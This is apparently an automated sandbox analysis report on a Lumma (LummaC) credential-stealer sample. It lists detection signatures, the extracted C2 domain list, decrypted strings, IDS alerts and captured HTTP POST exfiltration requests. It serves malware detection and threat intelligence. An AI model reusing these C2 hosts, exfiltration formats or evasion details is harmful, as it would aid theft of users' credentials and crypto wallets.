Edit tour

Windows Analysis Report
ronwod.exe

Overview

General Information

Sample name:	ronwod.exe
Analysis ID:	1581561
MD5:	63ff0c8e75aa669f22e79ebf017c0aa8
SHA1:	1255d7f37e1d2d36632bd142b76d8141c47c45a3
SHA256:	e8ac8d925f9b53bb66892cbac2f38cf7c1bcc5802a79c74c6d8b54e684b66e6a
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

ronwod.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\ronwod.exe" MD5: 63FF0C8E75AA669F22E79EBF017C0AA8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["appliacnesot.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "inherineau.buzz", "lackadausaz.click", "hummskitnj.buzz", "screwamusresz.buzz", "scentniej.buzz", "cashfuzysao.buzz"], "Build id": "IRiaFi--26dek1"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1778237713.0000000001046000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1777955203.000000000103E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1724682742.0000000001024000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1750093043.0000000001024000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1750624772.0000000001024000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1701708029.0000000001024000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1974188123.000000006CD4A000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1775565703.0000000001024000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1728584108.0000000001024000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ronwod.exe PID: 7544	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ronwod.exe PID: 7544	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ronwod.exe PID: 7544	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.ronwod.exe.e90000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.ronwod.exe.e90000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.ronwod.exe.6cd40000.2.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T08:17:35.808666+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.92.219	443	TCP
2024-12-28T08:17:37.915665+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.92.219	443	TCP
2024-12-28T08:17:40.769739+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.92.219	443	TCP
2024-12-28T08:17:43.452697+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.92.219	443	TCP
2024-12-28T08:17:45.788644+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.92.219	443	TCP
2024-12-28T08:17:48.507871+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.92.219	443	TCP
2024-12-28T08:17:50.929223+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.92.219	443	TCP
2024-12-28T08:17:58.112903+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.92.219	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T08:17:36.568903+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.92.219	443	TCP
2024-12-28T08:17:38.703199+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.92.219	443	TCP
2024-12-28T08:17:58.967526+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49741	104.21.92.219	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T08:17:36.568903+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.92.219	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T08:17:38.703199+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	104.21.92.219	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T08:17:49.171305+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.92.219	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.ronwod.exe.e90000.1.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["appliacnesot.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "inherineau.buzz", "lackadausaz.click", "hummskitnj.buzz", "screwamusresz.buzz", "scentniej.buzz", "cashfuzysao.buzz"], "Build id": "IRiaFi--26dek1"}

Multi AV Scanner detection for submitted file

Source: ronwod.exe	ReversingLabs: Detection: 43%
Source: ronwod.exe	Virustotal: Detection: 45%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 88.3% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lackadausaz.click
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp	String decryptor: IRiaFi--26dek1

Source: C:\Users\user\Desktop\ronwod.exe

Code function: 0_2_00EA4E25 CryptUnprotectData,

0_2_00EA4E25

Source: ronwod.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.219:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: ronwod.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 17265850h	0_2_00ED00C0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2]	0_2_00ECD0D9
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx ebx, word ptr [esi]	0_2_00E9A8B0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h	0_2_00ECF040
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00ECD9C1
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then lea edx, dword ptr [eax-00001099h]	0_2_00ECB1D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+12h]	0_2_00E9C942
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	0_2_00ECF150
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	0_2_00ECFB10
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 56ADC53Ah	0_2_00ECFB10
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	0_2_00ED04D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2-00002C30h]	0_2_00E9CC75
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then lea ecx, dword ptr [eax+000071B9h]	0_2_00EB6520
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]	0_2_00EB3675
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax]	0_2_00EB3675
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00EA90D1
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h	0_2_00ECB8A0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then lea eax, dword ptr [esi+00003763h]	0_2_00E9C08B
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]	0_2_00EB4060
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax]	0_2_00EB4060
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00EB904E
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_00EBB841
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+esi*2]	0_2_00ECE820
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	0_2_00ECE820
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	0_2_00ECE820
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	0_2_00ECE820
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then add ecx, edi	0_2_00EBB00F
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_00EB91B1
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	0_2_00ECE9D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	0_2_00ECE9D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	0_2_00ECE9D0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_00EB91B1
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx ecx, word ptr [esp+eax*2+28h]	0_2_00EB6990
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00EB2140
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then lea eax, dword ptr [esi+00003763h]	0_2_00E9C158
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	0_2_00ECE920
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	0_2_00ECE920
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	0_2_00ECE920
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00EA9930
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	0_2_00EA9930
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edi, word ptr [esp+eax*2+10h]	0_2_00EA9930
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then lea ecx, dword ptr [eax+00000960h]	0_2_00EAC119
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax*2+4D3B4CBCh]	0_2_00E9A2A6
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then lea edi, dword ptr [edx+00001E1Eh]	0_2_00E9DA8B
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_00EB5A90
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	0_2_00ECEA60
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	0_2_00ECEA60
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	0_2_00ECEA60
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h	0_2_00EB9266
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_00EB8A4D
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]	0_2_00EB9A43
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00EB0A20
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then lea edx, dword ptr [eax+00000960h]	0_2_00EAC3F4
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00ECDB39
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov dword ptr [edi], 60296828h	0_2_00EB4CCD
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [ebx+eax*2]	0_2_00EB4CCD
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov dword ptr [esp+04h], ebx	0_2_00EBB48C
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]	0_2_00EB3C40
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax]	0_2_00EB3C40
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then push eax	0_2_00ECDC5E
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h	0_2_00ECF450
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [esp+eax*2+04h]	0_2_00ECB450
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh	0_2_00ED0400
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00E97410
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00E97410
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+06h]	0_2_00EB85E1
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_00EB85E1
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+0000028Ch]	0_2_00EBD5E6
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then add eax, 10h	0_2_00EA95FD
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*2+40h]	0_2_00ECCDF0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edi, word ptr [ecx]	0_2_00EABD8F
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then lea ecx, dword ptr [eax-000037DBh]	0_2_00E99570
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00EBBD77
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then jmp edi	0_2_00E9A533
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]	0_2_00EB3EC0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax]	0_2_00EB3EC0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [esp+edx*2+14h]	0_2_00EC86C0
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	0_2_00EA5E8C
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00EBBE86
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00EBBE9D
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00EB1E60
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00EC4E60
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00E98E50
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h	0_2_00ED0650
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00EBBE3B
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]	0_2_00EB9630
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx ebx, word ptr [esp+edx*2+28h]	0_2_00EA77AD
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00EB9F80
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	0_2_00ECF780
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx ebp, word ptr [esp+ecx*2-7B41DE5Ah]	0_2_00EB5770
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [esi+ecx*8], E0A81160h	0_2_00EA6777
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h	0_2_00EA5F4C
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_00EAB729
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	0_2_00ECFF00
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then add eax, 10h	0_2_00EA95FD
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+esi*2]	0_2_00ECE710
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx eax, word ptr [esp+edi*2]	0_2_00ECE710
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]	0_2_00ECE710
Source: C:\Users\user\Desktop\ronwod.exe	Code function: 4x nop then movzx esi, word ptr [eax+ecx*2]	0_2_00ECE710

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.92.219:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: lackadausaz.click
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.92.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.92.219:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lackadausaz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: lackadausaz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HCM4U2A9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18104Host: lackadausaz.click
